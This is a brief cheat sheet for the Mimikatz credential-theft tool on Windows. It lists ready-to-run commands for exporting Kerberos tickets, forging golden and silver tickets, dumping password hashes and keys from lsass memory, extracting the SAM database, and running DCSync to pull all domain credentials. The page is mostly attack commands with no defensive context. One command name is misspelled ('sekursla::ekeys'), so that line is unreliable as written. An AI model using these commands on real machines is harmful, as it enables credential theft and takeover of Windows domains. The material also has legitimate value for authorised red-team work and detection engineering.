Mimikatz
Used to harvest credentials from a windows machine.
Has two additional components:
Mimidrv
: driver that interacts with windows kernelMimilib
: Bypass applocker, auth package/SSP etc.
Runs with:
Administrator
withPrivilege::debug
modeSYSTEM
privilege
Kerberos
ask
kerberos::ask
list
Lists or exports TGTs and STs from the current session
kerberos::list # Lists the tickets
kerberos::list /export # Export the tickets to files
purge
purge all TGTs and STs from the current session.
kerberos::purge
tgt
Prints information about the TGT from current session
kerberos::tgt
golden
Golden Tickets
Create golden tickets from krbtgt's NTLM hash or Kerberos keys.
silver
Create silver ticket from a service's NTLM hash or Kerberos keys.
SekurLSA
Dumps keys, password hashes, pin codes from protected memory of lsass.exe proccess. Rights required:
SYSTEM
Administrator with debug privilege (privilege::debug)
backupkeys
get backup master keys.
sekurlsa::backupkey
credman
Lists credential manager
sekurlsa::credman
dpapi
Lists cached master keys
sekurlsa::dpapi
ekeys
Lists kerberos encryption keys
sekursla::ekeys
LSAdump
sam
Dumps the sam database directory from memory or offline using the sam and system registry hives.
# On target machine
lsadump::sam
# Using system and sam hives
lsadump::sam /system:system.hiv /sam:sam.hiv
dcsync
Perform dc-sync on the domain controller to dump ntds credentails, keys etc.
# Dump credential of a specidic user
lsadump::dcsync /domain:mydomain.local /user:dr.dragon
# Dump all credentials
lsadump::dcsync /domain:mydomain.local /all
Last updated